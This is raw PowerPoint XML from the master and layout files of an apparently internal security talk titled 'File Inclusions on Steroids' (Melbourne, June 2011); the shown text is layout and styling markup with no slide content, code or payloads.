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717" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId21"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId22"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="258" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="259" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" b="1"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ul Theriault" initials="P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A640E"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="FF3300"/>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72" autoAdjust="0"/>
    <p:restoredTop sz="83333" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1680" y="-1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04" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="-315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78E01F4-DAAE-464A-9892-BEE185A484E3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/15/2014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12944A64-5900-4FB9-B6C2-C5F45CE33262}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16745017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b="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>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b="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C7178BF9-D1FE-4C14-B1D3-62D2982DF60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/15/2014</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"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AU"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b="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>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b="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{30F7F129-3BDC-42F8-8A03-A3BFFB026993}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5286812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50" descr="StratPMS1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4964" t="15845" r="5733" b="20773"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="142875" y="6000750"/>
            <a:ext cx="1606550" cy="357188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6357938"/>
            <a:ext cx="1500188" cy="28575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a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="3014663"/>
            <a:ext cx="7483475" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="4043363"/>
            <a:ext cx="7483475" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="1862138"/>
            <a:ext cx="7483475" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 353"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1903413"/>
            <a:ext cx="7467600" cy="884237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> INCLUSIONS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ON STEROIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 354"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="944563" y="4043363"/>
            <a:ext cx="7467600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Internal presentation, Melbourne, June 2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 354"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="944563" y="3100388"/>
            <a:ext cx="7467600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="341313" algn="l"/>
                <a:tab pos="446088" algn="l"/>
                <a:tab pos="895350" algn="l"/>
                <a:tab pos="1344613" algn="l"/>
                <a:tab pos="1793875" algn="l"/>
                <a:tab pos="2243138" algn="l"/>
                <a:tab pos="2692400" algn="l"/>
                <a:tab pos="3141663" algn="l"/>
                <a:tab pos="3590925" algn="l"/>
                <a:tab pos="4040188" algn="l"/>
                <a:tab pos="4489450" algn="l"/>
                <a:tab pos="4938713" algn="l"/>
                <a:tab pos="5389563" algn="l"/>
                <a:tab pos="5837238" algn="l"/>
                <a:tab pos="6286500" algn="l"/>
                <a:tab pos="6735763" algn="l"/>
                <a:tab pos="7185025" algn="l"/>
                <a:tab pos="7634288" algn="l"/>
                <a:tab pos="8083550" algn="l"/>
                <a:tab pos="8532813" algn="l"/>
                <a:tab pos="8982075" algn="l"/>
                <a:tab pos="8983663" algn="l"/>
                <a:tab pos="9432925" algn="l"/>
                <a:tab pos="9882188" algn="l"/>
                <a:tab pos="10331450" algn="l"/>
                <a:tab pos="10780713" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="MS Gothic" charset="-128"/>
              </a:rPr>
              <a:t>Eldar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="MS Gothic" charset="-128"/>
              </a:rPr>
              <a:t> Marcussen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="MS Gothic" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="MS Gothic" charset="-128"/>
              </a:rPr>
              <a:t>stratsec</a:t>
            </a:r>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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C6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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C6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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C61}"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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C61}"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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C61}"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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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788C5-6DEA-42E9-AEF6-85BF57319C61}"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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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788C5-6DEA-42E9-AEF6-85BF57319C6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1962" y="500046"/>
            <a:ext cx="5924550" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1536719"/>
            <a:ext cx="7772400" cy="4535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52425" y="500042"/>
            <a:ext cx="5924550" cy="5715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773238"/>
            <a:ext cx="3810000" cy="453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73238"/>
            <a:ext cx="3810000" cy="453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ight Triangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="642938" y="4214813"/>
            <a:ext cx="8501062" cy="2643187"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="500046"/>
            <a:ext cx="5924550" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785938" y="1785938"/>
            <a:ext cx="5572125" cy="4143375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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788C5-6DEA-42E9-AEF6-85BF57319C6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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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788C5-6DEA-42E9-AEF6-85BF57319C6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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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788C5-6DEA-42E9-AEF6-85BF57319C6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CBB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C6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bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4143380"/>
            <a:ext cx="9144000" cy="2714620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId7" cstate="print">
              <a:alphaModFix amt="38000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect b="-17000"/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Text Box 66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8347075" y="6497638"/>
            <a:ext cx="762000" cy="244475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7285CEA9-608C-4D36-96F1-C8DF4E132FDA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow Bold" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow Bold" charset="0"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 75"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="352425" y="1071563"/>
            <a:ext cx="5924550" cy="571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31" name="Rectangle 76"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
